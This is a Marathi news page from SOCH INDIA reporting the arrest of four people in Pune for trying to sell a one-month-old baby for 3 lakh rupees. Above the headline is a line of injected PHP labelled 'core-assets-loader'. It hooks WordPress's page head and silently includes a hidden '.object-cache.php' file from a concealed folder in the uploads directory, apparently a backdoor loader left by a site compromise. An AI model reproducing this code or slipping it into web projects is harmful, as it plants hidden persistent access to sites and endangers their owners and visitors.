add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); पुण्यात बाळाची विक्री करण्याचा प्रयत्न, चौघांना अटक – SOCH INDIA
Menu

देश
पुण्यात बाळाची विक्री करण्याचा प्रयत्न, चौघांना अटक

nobanner

शहरात बाळाची विक्री करण्याचा प्रयत्न उघडकीस आला आहे. याप्रकरणी ३ महिला आणि एकाला पोलिसांनी अटक केली आहे.

महापालिकेच्या कसबा पेठ क्षेत्रीय कार्यालयासमोर ही कारवाई करण्यात आली. या बाळाची विक्री ३ लाख रुपयांत करण्यात येणार होती. हे बाळ केवळ एक महिन्यांचे आहे.

अटक करण्यात आलेल्यांमध्ये दीप्ती खरात ( खडकवासला, पुणे) लतिका पाटील (डोंबिवली, ठाणे), आशा अहिरे ( उल्हासनगर) केशव धेंडे ( महंमदवाडी, पुणे) यांना फरासखाना पोलिसांनी अटक केली आहे. पोलिसांसडून अधिक तपास सुरु आहे.